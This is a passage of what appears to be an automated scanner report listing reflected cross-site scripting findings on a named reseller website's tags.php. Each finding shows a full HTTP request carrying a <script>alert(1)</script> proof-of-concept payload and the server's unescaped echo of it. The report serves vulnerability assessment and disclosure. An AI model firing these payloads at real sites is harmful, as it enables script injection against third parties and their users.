The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f0ca2<script>alert(1)</script>ee1a4cc843 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=D?f0ca2<script>alert(1)</script>ee1a4cc843=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=D?f0ca2<script>alert(1)</script>ee1a4cc843=1 was not found on this server.</p>
...[SNIP]...

2.4707. http://www.resellerbase.com/tags.php<r=E [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=E

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ece3<script>alert(1)</script>23c9448c299 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php5ece3<script>alert(1)</script>23c9448c299&ltr=E HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php5ece3<script>alert(1)</script>23c9448c299&ltr=E was not found on this server.</p>
...[SNIP]...

2.4708. http://www.resellerbase.com/tags.php<r=E [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c3461<script>alert(1)</script>18880d7933b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=E?c3461<script>alert(1)</script>18880d7933b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=E?c3461<script>alert(1)</script>18880d7933b=1 was not found on this server.</p>
...[SNIP]...

2.4709. http://www.resellerbase.com/tags.php<r=F [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=F

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a04f8<script>alert(1)</script>c87622fc15b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpa04f8<script>alert(1)</script>c87622fc15b&ltr=F HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpa04f8<script>alert(1)</script>c87622fc15b&ltr=F was not found on this server.</p>
...[SNIP]...

2.4710. http://www.resellerbase.com/tags.php<r=F [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=F

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 70222<script>alert(1)</script>4177c7bd5a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=F?70222<script>alert(1)</script>4177c7bd5a7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=F?70222<script>alert(1)</script>4177c7bd5a7=1 was not found on this server.</p>
...[SNIP]...

2.4711. http://www.resellerbase.com/tags.php<r=G [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=G

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 22f48<script>alert(1)</script>96b13bf45b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php22f48<script>alert(1)</script>96b13bf45b7&ltr=G HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php22f48<script>alert(1)</script>96b13bf45b7&ltr=G was not found on this server.</p>
...[SNIP]...

2.4712. http://www.resellerbase.com/tags.php<r=G [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=G

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2555a<script>alert(1)</script>f1ba0d137a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=G?2555a<script>alert(1)</script>f1ba0d137a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=G?2555a<script>alert(1)</script>f1ba0d137a=1 was not found on this server.</p>
...[SNIP]...

2.4713. http://www.resellerbase.com/tags.php<r=H [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=H

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a9384<script>alert(1)</script>a3a51e579c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpa9384<script>alert(1)</script>a3a51e579c1&ltr=H HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpa9384<script>alert(1)</script>a3a51e579c1&ltr=H was not found on this server.</p>
...[SNIP]...

2.4714. http://www.resellerbase.com/tags.php<r=H [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=H

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 26a29<script>alert(1)</script>b7002d12091 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=H?26a29<script>alert(1)</script>b7002d12091=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=H?26a29<script>alert(1)</script>b7002d12091=1 was not found on this server.</p>
...[SNIP]...

2.4715. http://www.resellerbase.com/tags.php<r=I [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=I

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bf25d<script>alert(1)</script>bb20fedc856 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpbf25d<script>alert(1)</script>bb20fedc856&ltr=I HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpbf25d<script>alert(1)</script>bb20fedc856&ltr=I was not found on this server.</p>
...[SNIP]...

2.4716. http://www.resellerbase.com/tags.php<r=I [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=I

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 897fe<script>alert(1)</script>6f32f9252d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=I?897fe<script>alert(1)</script>6f32f9252d4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=I?897fe<script>alert(1)</script>6f32f9252d4=1 was not found on this server.</p>
...[SNIP]...

2.4717. http://www.resellerbase.com/tags.php<r=J [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=J

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 18be3<script>alert(1)</script>8bf3f141685 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php18be3<script>alert(1)</script>8bf3f141685&ltr=J HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php18be3<script>alert(1)</script>8bf3f141685&ltr=J was not found on this server.</p>
...[SNIP]...

2.4718. http://www.resellerbase.com/tags.php<r=J [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=J

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9346a<script>alert(1)</script>bb93ccfe4be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=J?9346a<script>alert(1)</script>bb93ccfe4be=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=J?9346a<script>alert(1)</script>bb93ccfe4be=1 was not found on this server.</p>
...[SNIP]...

2.4719. http://www.resellerbase.com/tags.php<r=K [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=K

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c93d9<script>alert(1)</script>b7a3e29635 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpc93d9<script>alert(1)</script>b7a3e29635&ltr=K HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpc93d9<script>alert(1)</script>b7a3e29635&ltr=K was not found on this server.</p>
...[SNIP]...

2.4720. http://www.resellerbase.com/tags.php<r=K [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=K

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fe13d<script>alert(1)</script>a85363680df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=K?fe13d<script>alert(1)</script>a85363680df=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=K?fe13d<script>alert(1)</script>a85363680df=1 was not found on this server.</p>
...[SNIP]...

2.4721. http://www.resellerbase.com/tags.php<r=L [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=L

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1a516<script>alert(1)</script>f7894c50d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php1a516<script>alert(1)</script>f7894c50d8&ltr=L HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php1a516<script>alert(1)</script>f7894c50d8&ltr=L was not found on this server.</p>
...[SNIP]...

2.4722. http://www.resellerbase.com/tags.php<r=L [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=L

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 39347<script>alert(1)</script>deea2df5e35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=L?39347<script>alert(1)</script>deea2df5e35=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=L?39347<script>alert(1)</script>deea2df5e35=1 was not found on this server.</p>
...[SNIP]...

2.4723. http://www.resellerbase.com/tags.php<r=M [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=M

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ae09c<script>alert(1)</script>643dff8ab8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpae09c<script>alert(1)</script>643dff8ab8f&ltr=M HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpae09c<script>alert(1)</script>643dff8ab8f&ltr=M was not found on this server.</p>
...[SNIP]...

2.4724. http://www.resellerbase.com/tags.php<r=M [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=M

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d16c6<script>alert(1)</script>ad2c5db412c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=M?d16c6<script>alert(1)</script>ad2c5db412c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=M?d16c6<script>alert(1)</script>ad2c5db412c=1 was not found on this server.</p>
...[SNIP]...

2.4725. http://www.resellerbase.com/tags.php<r=N [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=N

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 87697<script>alert(1)</script>8d5e0d3d656 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php87697<script>alert(1)</script>8d5e0d3d656&ltr=N HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
